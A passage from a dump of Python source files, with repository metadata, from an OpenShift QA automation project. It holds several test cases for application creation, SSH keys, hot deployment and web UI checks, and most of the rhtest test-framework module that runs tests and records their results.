self.steps.append(testcase.TestCaseStep(\"Create over limit app\",\n common.create_app,\n function_parameters = [self.app_name+\"OVER\", \n common.app_types[self.app_type], \n self.user_email, \n self.user_passwd, False],\n expect_string_list = [\"No nodes available\",], \n expect_return=\"!0\"))\n\n case = testcase.TestCase(self.summary, self.steps)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(FacterActiveApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of facter_active_app.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6837678551673889, "alphanum_fraction": 0.6837678551673889, "avg_line_length": 20.23214340209961, "blob_id": "482eb9d67418e07de1c470e13404cb74bbfcd883", "content_id": "8f98df0e5082282170fe428263543186a2f3e468", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1189, "license_type": "no_license", "max_line_length": 62, "num_lines": 56, "path": "/automation/open/testmodules/RT/client/template.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n\tself.key_filename=\"my_testing_second_key\"\n\tself.new_keyname=\"second\"\n\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass AddSSHKey(OpenShiftTest):\n def test_method(self):\n\n\t\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddSSHKey)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6674107313156128, "alphanum_fraction": 0.6690848469734192, "avg_line_length": 23.547945022583008, "blob_id": "958cc3f8f72e6fcd0e45c6d02c53425f4c99b064", "content_id": "d222ef05db3b4359bfe2a40b4307f9f7994da6e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1792, "license_type": "no_license", "max_line_length": 83, "num_lines": 73, "path": "/automation/open/testmodules/RT/Demo01.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\n\"\"\"\nimport rhtest\nimport database\nimport time\n\nimport random\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = ['DEV', 'STG']\n\n def initialize(self):\n self.msg = 
self.config.msg\n\n def finalize(self):\n pass\n\n\nclass TestPreReqPass(OpenShiftTest):\n def test_method(self):\n self.info(\"%s\" % self.msg)\n return self.passed(\"test passed.\")\n\nclass DependentParent(OpenShiftTest):\n PREREQUISITES = [rhtest.PreReq(\"TestPreReqPass\")]\n\n def test_method(self):\n self.info(\"This is the parent...\")\n return self.passed(\"test passed.\")\n\nclass DependentOne(OpenShiftTest):\n PREREQUISITES = [rhtest.PreReq(\"DependentParent\")]\n \n def test_method(self):\n self.info(\"This is the child #1...\")\n return self.passed(\"test passed.\")\n\nclass DependentTwo(OpenShiftTest):\n PREREQUISITES = [rhtest.PreReq(\"DependentParent\")]\n \n def test_method(self):\n self.info(\"This is the child #2...\")\n return self.failed(\"test failed.\")\n\nclass DependentThree(OpenShiftTest):\n PREREQUISITES = [rhtest.PreReq(\"DependentOne\"), rhtest.PreReq(\"DependentTwo\") ]\n \n def test_method(self):\n # this test will NOT be executed unless DependentOne & DependentTwo passed\n self.info(\"This is the child #3, you shouldn't NEVER see this message...\")\n return self.passed(\"test passed.\")\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(TestPreReqPass)\n suite.add_test(DependentParent)\n suite.add_test(DependentOne)\n suite.add_test(DependentTwo)\n suite.add_test(DependentThree)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7064748406410217, "alphanum_fraction": 0.7208632826805115, "avg_line_length": 23.821428298950195, "blob_id": "0846fb54ab946b54e1a9279792a5d819670a53c5", "content_id": "ab1b469d30eefdc0fb2e1090a00e6b8858eb2e53", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 695, "license_type": "no_license", "max_line_length": 115, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/nodejs_scaling_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 13, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom nodejs_with_jenkins import NodeJSHotDeployWithJenkins\n\nclass NodeJSScalingHotDeployWithJenkins(NodeJSHotDeployWithJenkins):\n def __init__(self, config):\n NodeJSHotDeployWithJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2747][RT]Hot deployment support for scalable application - with Jenkins - nodejs\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NodeJSScalingHotDeployWithJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6047156453132629, "alphanum_fraction": 0.6287563443183899, "avg_line_length": 27.077922821044922, "blob_id": "cd18a703b443b91a6be202edf44781204ca1bb2d", "content_id": "1f92124d628a13b369180511a79ca9e8b2e5f7f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2163, "license_type": "no_license", "max_line_length": 211, "num_lines": 77, "path": "/automation/open/testmodules/UI/web/case_180945.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_180945.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n 
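        # no per-test cleanup is needed here; the Selenium driver for this
        # web UI case is shut down in tearDown() at the end of test_method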
pass\n\n\nclass CreateRubyAndRailsApp(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n #web.delete_app(\"ruby19\")\n #create a ruby1.9 app\n #web.create_app(\"rails\",\"rubyonrails\")\n web.go_to_create_app(\"rails\")\n web.input_by_id(\"application_name\", \"rubyonrails\")\n web.click_element_by_id(\"application_submit\")\n time.sleep(50)\n web.assert_text_equal_by_xpath('''Your application has been created. If you're new to OpenShift check out these tips for where to go next.''', '''//div[@id='content']/div/div/div/div[2]/div/section/p''')\n \n #check the \"appurl\" link\n time.sleep(500)\n web.go_to_app_detail(\"rubyonrails\")\n web.click_element_by_xpath('''//div[@id='content']/div/div/div/div[2]/nav/div/a''')\n time.sleep(5)\n web.assert_text_equal_by_xpath(\"OpenShift - Rails 3.2\",'''//h1''') \n\n #delete a rubyonrails app\n web.go_to_app_detail(\"rubyonrails\")\n time.sleep(2)\n web.click_element_by_link_text(\"Delete this application\")\n time.sleep(1)\n web.click_element_by_id(\"application_submit\")\n time.sleep(40)\n web.go_to_app_detail(\"rubyonrails\")\n web.assert_text_equal_by_xpath(\"Sorry, but the page you were trying to view does not exist.\", '''//article/div/p''')\n\n\n self.tearDown()\n\n return self.passed(\" case_180945--CreateRubyAndRailsApp passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateRubyAndRailsApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_180945.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5615406036376953, "alphanum_fraction": 0.5645065903663635, "avg_line_length": 39.207096099853516, "blob_id": "c6602fa69aceb97be76743b62413972c89a39e0e", "content_id": "f53480641dbebb15f7960bc6f0628b7b0569258b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 69117, "license_type": "no_license", "max_line_length": 273, "num_lines": 1719, "path": "/automation/open/lib/rhtest.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# License: LGPL\n# Forked from pyNMS qatest module.\n\n\"\"\"\nThis module contains the test case and test suite classes used to control\nthe running of tests and provides a basic framework for automated testing.\nIt is the core part of automated testing.\n\nThis module defines a Test class, which is the base class for all test\ncase implementations. This class is not normally substantiated itself, but\na subclass is defined that defines a 'test_method()' method. \n\nTo use the test case, instantiate your class and call it with test method\nparameters. You can define two hook methods in the subclass: 'initialize'\nand 'finalize'. These are run at the beginning and end of the test,\nrespectively.\n\n\nAll test related errors are based on the 'TestError' exception. If a test\ncannot be completed for some reason you may raise a 'TestIncompleteError'\nexception.\n\nYour 'test_method()' should return the value of the 'passed()' or\n'failed()' method, as appropriate. You may also use assertions. 
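A minimal sketch of a concrete test case (the names here are illustrative,
not part of the framework contract):

    class MyCase(Test):
        def test_method(self):
            self.assert_equal(1 + 1, 2)   # assertion helper from Test
            return self.passed('arithmetic still works')

    suite = TestSuite(config)
    suite.add_test(MyCase)
    suite()   # runs the added cases in the order they were added
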
The standard Python 'assert' keyword may be used, or the assertion test
methods may be used.

Usually, a set of test cases is collected in a TestSuite object, and run
sequentially by calling the suite instance.

\"\"\"

import sys, os
import shutil
import debugger
import datetime
import scheduler
import timelib
import signal
import database
import re
import traceback
import inspect
from helper import TimeoutError, cmd_get_status_output, get_tmp_dir
import time
import testcase
import tcms_base
import tcms

__all__ = [ 'Test', 'PreReq', 'TestSuite', 'repr_test', 'initialize', 'finalize']

# exception classes that may be raised by test methods.
class TestError(AssertionError):
    \"\"\"TestError() Base class of testing errors.\"\"\"
    pass

class TestIncompleteError(TestError):
    \"\"\"Test case disposition could not be determined.\"\"\"
    pass

class TestFailError(TestError):
    \"\"\"Test case failed to meet the pass criteria.\"\"\"
    pass

class TestSuiteAbort(RuntimeError):
    \"\"\"Entire test suite must be aborted.\"\"\"
    pass

class TestSuiteWaived(RuntimeError):
    \"\"\"Entire test suite is waived (not run in this environment).\"\"\"
    pass

# NOTE: add_exception() and the Enum/IF helpers used below appear to come
# from the pyNMS-derived support libraries this module was forked from;
# their import is not visible in this snapshot.
# \"public\" exceptions
add_exception(TestIncompleteError)
add_exception(TestFailError)
add_exception(TestSuiteAbort)


# One of the below values should be returned by test_method(). The usual
# method is to return the value of the method with the same name. E.g.
# 'return self.passed()'. The Test.passed() method adds a passed message
# to the report, and returns the PASSED value for the suite to check.

# for multiple UUTs we use this status to indicate whether or not the
# test ran to completion.
COMPLETED = Enum(2, \"COMPLETED\")

# test_method() passed, and the suite may continue.
PASSED = Enum(1, \"PASSED\")

# test_method() failed, but the suite can continue. You may also raise a
# TestFailError exception.
FAILED = Enum(0, \"FAILED\")

# test_method() could not complete, and the pass/fail criteria could not be
# determined, but the suite may continue. You may also raise a TestIncompleteError
# exception.
INCOMPLETE = Enum(-1, \"INCOMPLETE\")

# test_method() could not complete, and the suite cannot continue. Raising
# TestSuiteAbort is the same.
ABORT = Enum(-2, \"ABORT\")

SKIP = Enum(-3, \"SKIP\")

WAIVED = Enum(-4, \"WAIVED\")

# default report message
NO_MESSAGE = \"no message\"



######################################################
# abstract base class of all tests
class Test(object):
    \"\"\"Base class for all test cases. The test should be as atomic as possible.
    Multiple instances of these may be run in a TestSuite object. Be sure to
    set the PREREQUISITES class-variable in the subclass if the test has a
    prerequisite test.\"\"\"
    # prerequisite tests are static, defined in the class definition.
    # They are defined by the PreReq class. The PreReq class takes a name of a
    # test case (which is the name of the Test subclass) and any arguments that
    # the test requires. A unique test case is defined by the Test class and
    # its specific arguments. The PREREQUISITES class attribute is a list of
    # PreReq objects.
    # e.g. 
PREREQUISITES = [PreReq(\"MyPrereqTest\", 1)]\n PREREQUISITES = []\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = None # type of test we are running \n\n def __init__(self, config):\n self._tests = {}\n self._testname = self.__class__.__name__\n self._tests[self._testname] = self._testname\n self.config = config \n self.config.test_name = self.__class__.__name__\n self.config.tests= self._tests\n self.config.total_time = 0\n self._report = config.report \n self._ui = config.userinterface\n self._debug = config.options.DEBUG \n self._verbose = config.options.VERBOSE\n self._tcms_stuff = {\n 'current_testcase_id': None, \n 'current_testcase_run_id': None, \n 'current_test_run_id': None } # hold tcms stuff\n\n if self.config.__dict__.has_key(\"tcms_arguments\") and isinstance(self.config.tcms_arguments, dict):\n if self.config.tcms_arguments.has_key(\"variants\"):\n self.info(\"Warning: Obsolete format for test_variant in TCMS. Please use {'variant': 'php'} format instead.\")\n if isinstance(self.config.tcms_arguments[\"variants\"],list):\n self.info(\"Warning: List in variants is not supported. Only the first item will be used.\")\n self.test_variant = self.config.tcms_arguments[\"variants\"][0]\n self.config.test_variant = self.config.tcms_arguments[\"variants\"][0]\n else:\n self.test_variant = self.config.tcms_arguments[\"variants\"]\n self.config.test_variant = self.config.tcms_arguments[\"variants\"]\n elif self.config.tcms_arguments.has_key(\"variant\"):\n if isinstance(self.config.tcms_arguments[\"variant\"],list):\n self.info(\"Warning: List in variant is not supported. Only the first item will be used.\")\n self.test_variant = self.config.tcms_arguments[\"variant\"][0]\n self.config.test_variant = self.config.tcms_arguments[\"variant\"][0]\n else:\n self.test_variant = self.config.tcms_arguments[\"variant\"]\n self.config.test_variant = self.config.tcms_arguments[\"variant\"]\n \n #this is only for developing/debugging\n # - it's easier to just setup variable instead of .conf file\n if os.getenv(\"OPENSHIFT_test_variant\"):\n self.test_variant = os.getenv(\"OPENSHIFT_test_variant\")\n self.config.test_variant = self.test_variant\n\n self.tcms_testcaserun_id = self.config.tcms_testcaserun_id\n self.tcms_obj = self.config.tcms_obj\n #print \"----->\", self.config.tcms_obj\n\n\n # XXX: this flag attribute should be added with slstorage.\n if not config.has_key('NORECORD'):\n config['NORECORD'] = False\n self._norecord= config.NORECORD\n\n self.disposition = {}\n self.configfile = os.path.join(os.path.dirname(sys.modules[self.__module__].__file__), \"%s.conf\" % (self._tests[self._testname],))\n\n self._steps = [] #list of TestSteps\n self._steps_output = dict() #list of TestSteps's outputs\n\n def __call__(self, *args, **kw):\n cf = self.config\n if os.path.isfile(self.configfile):\n execfile(self.configfile, cf.__dict__)\n #cf.mergefile(self.configfile)\n #self.info('xxx', 1)\n try:\n cf.config_ID = os.path.basename(cf.config_ID.split()[1])\n except AttributeError:\n cf.config_ID = None\n except IndexError:\n cf.config_ID = \"<undefined>\"\n print >>sys.stderr, 'Make sure your config file is type \"ktext\" in Perforce.'\n else:\n cf.config_ID = None\n # this heading displays the test name just as a PREREQUISITES entry needs.\n self._ui.add_heading(repr_test(self._testname, args, kw), 2)\n self._report.add_heading(repr_test(self._testname, args, kw), 2)\n \n if cf.config_ID:\n self.info(\"Configuration ID: %s\" % (cf.config_ID,))\n 
self.starttime = timelib.now()\n self.info(\"STARTTIME: %s\" % self.timestamp(self.starttime))\n rv = None # in case of exception\n try:\n rv = self._initialize(rv)\n if rv is not None: # an exception happened\n try:\n self.update_testcaserun('ERROR')\n except:\n print \"ERROR: Unable to update TCMS status after _initialize() error: \"\n return rv\n except Exception as e:\n #TODO: how to store results into TCMS?\n self.error(\"Test initialization failed - exiting\")\n return 254\n #raise TestSuiteAbort(\"Unable to initialize testcase...\")\n # test elapsed time does not include initializer time.\n teststarttime = timelib.now()\n # run test_method\n testloops = int(cf.get(\"testloops\", 1))\n try:\n for l in xrange(testloops):\n rv = apply(self.test_method, args, kw)\n except KeyboardInterrupt:\n if self._debug:\n ex, val, tb = sys.exc_info()\n debugger.post_mortem(ex, val, tb)\n rv = self.abort(\"%s: aborted by user.\" % self._tests[self._testname])\n self._finalize(rv)\n raise\n except (TestFailError, testcase.TestCaseStepFail), errval:\n rv = self.failed(\"Caught Fail exception: %s\" % (errval,))\n except (TestIncompleteError, TimeoutError), errval:\n rv = self.incomplete(\"Caught Incomplete exception: %s\" % (errval,))\n self.debug(\"-\"*80)\n traceback.print_exc(file=sys.stderr)\n self.debug(\"-\"*80)\n except AssertionError, errval:\n rv = self.failed(\"failed assertion: %s\" % (errval,))\n except TestSuiteAbort:\n ex, val, tb = sys.exc_info()\n if self._debug:\n debugger.post_mortem(ex, val, tb)\n tb = None\n rv = self.incomplete(\"%s: ### Abort Exception occured! (%s: %s)\" % (self._tests[self._testname], ex, val))\n raise # pass this one up to suite\n\n self.endtime = timelib.now()\n minutes, seconds = divmod(self.endtime - teststarttime, 60.0)\n hours, minutes = divmod(minutes, 60.0)\n self._test_execution_time = \"%02.0f:%02.0f:%02.2f\" % (hours, minutes, seconds)\n self.config.total_time += self.endtime - teststarttime\n self.info(\"Time elapsed: %s\" % (self._test_execution_time))\n rv = self._finalize(rv)\n # if not specified in command line, then record the result by default\n #print \"CF_OPTION_RECORD: %s\" % cf.options.RECORD\n\n self.update_testcaserun()\n\n if not cf.options.TCMS:\n self.info(\"Records NOT written into TCMS...\")\n #print \"OP: %s\" % cf.options.tcms_run_details\n try:\n run_id, case_run_id, testcase_id = cf.options.tcms_run_details.split(',')\n self._tcms_stuff['current_testcase_id'] = int(testcase_id)\n self._tcms_stuff['current_testcase_run_id'] = int(case_run_id)\n self._tcms_stuff['current_test_run_id'] = int(run_id)\n except:\n pass\n\n else:\n # put TCMS related stuff here. XXX need to look for this option\n # earlier as well to start a testrun/testcaserun within TCMS, so\n # this function will just update the status. By this time, the\n # testrun will be know (saved from earlier). 
Update the\n # testcaserun as well if need be.\n testcase_id = self.config.tcms_obj.get_testcase_id_by_script_name(self.__module__)\n tcms_res = self.update_db_tcms(testcase_id)\n if tcms_res[1] is None:\n case_run_id = None\n else:\n case_run_id = tcms_res[1][0]['case_run_id']\n\n if tcms_res[1] is None:\n run_id = None\n else:\n run_id = tcms_res[1][0]['run_id']\n\n\n self._tcms_stuff['current_testcase_id'] = testcase_id\n self._tcms_stuff['current_testcase_run_id'] = case_run_id\n self._tcms_stuff['current_test_run_id'] = run_id\n self.info(\"Results written to TCMS...\")\n\n if not cf.options.RECORD:\n self.info(\"Records NOT stored in database\")\n else:\n self._record_results()\n self.info(\"Results written to SQL DB %s ...\" % (cf.HOST))\n\n return rv\n\n def _initialize(self, rv):\n \"\"\" Test \"\"\"\n self._report.add_heading(\"Test suite: %s\" % self.__class__.__name__, 1)\n try:\n self.initialize()\n except:\n ex, val, tb = sys.exc_info()\n self.diagnostic(\"%s (%s)\" % (ex, val))\n if self._debug:\n debugger.post_mortem(ex, val, tb)\n rv = self.abort(\"Test initialization failed!\")\n self.debug(\"-\"*80)\n traceback.print_exc(file=sys.stderr)\n self.debug(\"-\"*80)\n return rv\n\n # run user's finalize() and catch exceptions. If an exception occurs\n # in the finalize() method (which is supposed to clean up from the\n # test and leave the UUT in the same condition as when it was entered)\n # then alter the return value to abort(). \n def _finalize(self, rv):\n try:\n self.finalize()\n except:\n ex, val, tb = sys.exc_info()\n self.diagnostic(\"%s (%s)\" % (ex, val))\n if self._debug:\n debugger.post_mortem(ex, val, tb)\n rv = self.abort(\"Test finalize failed!\")\n return rv\n\n def get_instance_ip(self):\n return self.config.instance_info['ip']\n\n def get_run_mode(self):\n return self.config.options.run_mode\n\n def get_variant(self):\n \"\"\"\n This function should be run inside try/except to handle cases \n when no variant is defined.\n \"\"\"\n return self.config.test_variant\n\n def timestamp(self, abstime):\n return timelib.strftime(\"%a, %d %b %Y %H:%M:%S %Z\", timelib.localtime(abstime))\n\n def logfilename(self, ext=\"log\"):\n \"\"\"Return a standardized log file name with a timestamp that should be\n unique enough to not clash with other tests, and also able to correlate\n it later to the test report via the time stamp.\"\"\"\n return \"%s-%s.%s\" % (self._tests[self._testname], timelib.strftime(\"%Y%m%d%H%M%S\", timelib.localtime(self.starttime)), ext)\n\n def _record_results(self):\n \"\"\"\n There are two types of records:\n 1. TCMS\n 2. mysql \n \"\"\"\n resid = self._update_db()\n if resid is None:\n pass\n else:\n self.info(\"TestResult ID is %s.\" % (resid,))\n try:\n self.record_results(resid)\n except:\n import traceback\n import string\n import sys\n print \"An error was thrown: %s\"\\\n %string.join(traceback.format_exception(*sys.exc_info()), '')\n pass\n\n def record_results(self, resid, testcase_id=None):\n \"\"\"Override this if you need additional result records. 
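        (Illustrative override sketch only -- ExtraResult is a hypothetical
        table, not part of this module:

            def record_results(self, resid, testcase_id=None):
                database.ExtraResult(result_id=resid, note='extra data')
        )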
This method is\n passed the TestResult tables result ID for this test run, to use as the\n foreign key.\"\"\"\n pass\n\n def _update_db(self):\n ui = self.config.userinterface\n rdb = self.config.resultsdirbase\n burl = self.config.baseurl\n cf = self.config\n if self.config.comment is not None:\n if self.config.comment.startswith('='):\n self.config.comment = self.config.comment[1:]\n\n if self.config.comment.startswith('\"') and self.config.comment.endswith('\"'):\n # get rid of quotes\n self.config.comment = self.config.comment[1:-1]\n # use the hardcoded value if none is given.\n passfail = str(self.disposition[0])[0]\n build_version = cf.instance_info['build_version']\n ami_id = cf.instance_info['ami_id']\n instance_ip = cf.instance_info['ip']\n run_mode = self.config.options.run_mode\n\n database.connect2db(self.config.DBURI)\n if sys.platform.startswith('linux'):\n signal.signal(signal.SIGCHLD, signal.SIG_IGN) #to avoid warning from pipe.close from commands.getoutput\n tr = database.TestResults(\n AmiID=ami_id,\n TestName=self._tests[self._testname],\n StartTime=datetime.datetime.fromtimestamp(self.starttime),\n EndTime= datetime.datetime.fromtimestamp(self.endtime),\n TestbedID = instance_ip,\n TestScript = cf.test_name,\n ResultsDataFile = \",\".join(map(lambda s: burl + \"/testresults/\" + s[len(rdb)+1:], map(str, self.config.reportfilenames))),\n User=str(self.config.user),\n Comments = self.config.options.notes,\n PassFail=passfail,\n BuildVersion =build_version,\n RunMode = run_mode,\n TcmsTag = cf.options.tag,\n TcmsTestCaseId = self._tcms_stuff['current_testcase_id'],\n TcmsTestCaseRunId = self._tcms_stuff['current_testcase_run_id'],\n TcmsTestRunId = self._tcms_stuff['current_test_run_id'],\n )\n self.diagnostic(\"ID: %s\" % tr.id)\n return tr.id\n \n def update_db_tcms(self, testcaserun_id=None):\n \"\"\"\n tcms_obj and testrun_res are the keys to be used.\n \"\"\"\n\n status_lookup = {'PASSED': 2, 'FAILED': 3}\n tcms = self.config.tcms_obj\n testrun_id = None\n res = None\n for testrun_res in self.config.testrun_res:\n testrun_id = testrun_res['run_id']\n if testcaserun_id == testrun_res['case_id']:\n testrun_id = testrun_res['run_id']\n case_run_id = testrun_res['case_run_id']\n test_status = self.disposition[0].__str__()\n status_bit = status_lookup[test_status]\n params = {'case_run_status': status_bit, 'notes': self.config.results_url,\n 'estimated_time': self._test_execution_time}\n res = tcms.update_testcaserun(case_run_id, params)\n # update the test run status to FINISH if this is the only test in the\n # test run\n return (tcms.update_testrun(testrun_id, {'status': 0}), res)\n\n\n def save_fileobject(self, fo, name=None):\n \"\"\"Save a file-like object to results directory. 
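        Illustrative usage (the StringIO source here is just an example):

            self.save_fileobject(StringIO.StringIO('raw output'), name='run.log')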
        You must supply a file name if the file-like object does not have a name.\"\"\"
        dst = self.get_pathname(name or fo.name)
        outf = file(dst, \"w\")
        shutil.copyfileobj(fo, outf)
        outf.close()

    def save_file(self, fname):
        \"\"\"Save your generated data file into the results directory.\"\"\"
        shutil.copy(fname, os.path.expandvars(self.config.resultsdir))

    def save_object(self, obj, filename=None):
        \"\"\"Save an object into the filename in the results directory.\"\"\"
        if not filename:
            filename = \"%s.txt\" % (obj.__class__.__name__,)
        # kludge alert
        if filename.endswith(\".xml\"):
            self.config.resultsfilename = filename
        filename = self.get_pathname(filename)
        outf = file(filename, \"w\")
        try:
            outf.write(str(obj))
        finally:
            outf.close()
        return filename

    def get_pathname(self, filename):
        \"Return full pathname to results directory with given filename.\"
        return os.path.join(os.path.expandvars(self.config.resultsdir), os.path.basename(filename))

    # Tests expose the scheduler interface also
    def sleep(self, secs):
        \"\"\"Sleep method simply sleeps for specified number of seconds.\"\"\"
        return scheduler.sleep(secs)

    def schedule(self, delay, cb):
        \"\"\"Schedule a callback to run 'delay' seconds in the future.\"\"\"
        return scheduler.add(delay, callback=cb)

    def timed(self, function, args=(), kwargs={}, timeout=30):
        \"\"\"Call a method with a failsafe timeout value.\"\"\"
        sched = scheduler.get_scheduler()
        return sched.timeout(function, args, kwargs, timeout)

    def timedio(self, function, args=(), kwargs={}, timeout=30):
        \"\"\"Call a method with a failsafe I/O timeout value.\"\"\"
        sched = scheduler.get_scheduler()
        return sched.iotimeout(function, args, kwargs, timeout)

    def run_subtest(self, _testclass, *args, **kwargs):
        \"\"\"Runs a test class with the given arguments.\"\"\"
        inst = _testclass(self.config)
        return apply(inst, args, kwargs)

    # NOTE: this zero-argument debug() is shadowed by the debug(self, msg)
    # logging method defined further down in this class, so it is
    # effectively unreachable as written.
    def debug(self):
        \"\"\"Enter the debugger... at will.\"\"\"
        debugger.set_trace()

    def set_debug(self, onoff=1):
        \"\"\"Turn on or off the DEBUG flag.\"\"\"
        ov = self._debug
        self._debug = self.config.flags.DEBUG = onoff
        return ov

    def set_verbose(self, onoff=1):
        \"\"\"Turn on or off the VERBOSE flag.\"\"\"
        ov = self._verbose
        self._verbose = self.config.flags.VERBOSE = onoff
        return ov

    def prerequisites(self):
        \"Get the list of prerequisites, which could be empty.\"
        return getattr(self, \"PREREQUISITES\", [])

    # the overrideable methods
    def initialize(self):
        \"Hook method to initialize a test. Override if necessary.\"
        pass

    def finalize(self):
        \"Hook method when finalizing a test. 
        Override if necessary.\"
        pass

    ### the primary test method that subclasses must define.
    def test_method(self, *args, **kw):
        \"\"\"Override this method in a subclass to implement a specific test.\"\"\"
        return self.failed('you must define a method named \"test_method\" in your subclass.')

    # result reporting methods
    def methodstring(self, meth, *args):
        \"\"\"Return a string representation of a method object plus its arguments.\"\"\"
        return \"%s(%s)\" % (meth.im_func.func_name, \", \".join(map(str, args)))

    def get_status(self, testcase_id=0):
        try:
            return self.disposition[testcase_id].__str__()
        except:
            # if no status has been assigned yet
            return None

    def update_testcaserun(self, set_status=None):
        if self.tcms_testcaserun_id != None:
            if (set_status == None):
                status = self.get_status()
                if status is None:
                    self.info(\"Unable to get result of testcase, ERROR used instead\")
                    status = 'ERROR'
            else:
                status = set_status
            if status not in tcms.CASE_RUN_STATUS.keys():
                status = tcms.rhtest_disposition_to_tcms_mapping[status]

            params = dict()
            params['case_run_status'] = tcms.CASE_RUN_STATUS[status]
            try:
                params['estimated_time'] = self._test_execution_time
            except:
                #case when aborted during suite initialization
                pass

            \"\"\"
            if self.tcms_testcaserun_notes == None:
                params = {'case_run_status' : tcms.CASE_RUN_STATUS[status],
                          'estimated_time': self._test_execution_time}
            else:
                params = {'case_run_status' : tcms.CASE_RUN_STATUS[status],
                          'notes' : self.tcms_testcaserun_notes,
                          'estimated_time': self._test_execution_time}
            \"\"\"
            try:
                self.info(\"Updating TCMS test case run [%s] ...\" % status)
                self.tcms_obj.update_testcaserun(self.tcms_testcaserun_id, params)
                self.info(\"Done.\")
            except Exception as e:
                self.error(\"ERROR: Unable to update TCMS for %s. %s\" % (self.tcms_testcaserun_id, str(e)))
        else:
            self.info(\"Warning: tcms_testcaserun_id is not defined, TestCaseRun is NOT updated\")

    def passed(self, msg=NO_MESSAGE, testcase_id=0):
        \"\"\"Call this and return if the test_method() passed. 
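        (typically: return self.passed('all checks ok') at the end of test_method())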
If part of\n a suite, subsequent tests may continue.\"\"\"\n self._ui.passed(msg)\n self._report.passed(msg)\n self.disposition[testcase_id] = PASSED\n return PASSED\n\n def failed(self, msg=NO_MESSAGE, testcase_id=0):\n \"\"\"Call this and return if the test_method() failed, but can continue\n the next test.\"\"\"\n self._ui.failed(msg)\n self._report.failed(msg)\n self.disposition[testcase_id] = FAILED\n return FAILED\n \n def skip(self, msg=NO_MESSAGE, testcase_id=0):\n #TODO:\n return SKIP\n\n def waived(self, msg=NO_MESSAGE, testcase_id=0):\n self._ui.abort(msg)\n self._report.abort(msg)\n self.disposition[testcase_id] = WAIVED\n return WAIVED\n\n def completed(self, msg=NO_MESSAGE):\n self._ui.completed(msg)\n self._report.completed(msg)\n return COMPLETED\n\n def incomplete(self, msg=NO_MESSAGE, testcase_id=0):\n \"\"\"Test could not complete.\"\"\"\n self._ui.incomplete(msg)\n self._report.incomplete(msg)\n self.disposition[testcase_id] = INCOMPLETE\n return INCOMPLETE\n\n def abort(self, msg=NO_MESSAGE):\n \"\"\"Some drastic error occurred, or some condition is not met, and the suite cannot 